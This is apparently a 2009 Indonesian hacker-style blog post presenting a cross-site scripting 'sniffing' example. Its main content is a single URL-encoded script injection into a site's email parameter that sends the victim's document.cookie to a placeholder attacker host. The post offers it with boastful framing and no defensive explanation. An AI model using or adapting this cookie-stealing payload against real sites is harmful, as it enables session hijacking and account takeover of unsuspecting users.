"Welcome, Thanks for Coming ... Scroll Down To See All The Description ... (>> PLEASE INSERT COMMENT TO OUR SHOUTMIX WIDGET SYSTEM before ScRoLlInG DoWn - THANKS ... REPOST is FORBIDDEN but LINKBACK is OK" »


Rabu, Maret 04, 2009

Salah Satu Koding Sort Sniffing :
XXS : (cross scripting)

REVEALED : nothing impossible, nothing so secure... SO KEEP WISE,... (serverside? No Prob)

http://www.somesite.com/vulnerable.php?email=sarid_harper@somesite.com%3Cscript%3E%20window.open(%27http://%3CATTACKER%3E/write_to_file.o?Session=%27+document.cookie,%27obj_window%27,%27fullscreen=no,toolbar=no,status=no,menubar=no,scrollbars=no,resizable=yes,directories=no,location=no,width=100,height=100%27);%3C/script%3E

Leoniyte : the legend back...

0 c0mm3nts / t35t!m0n13: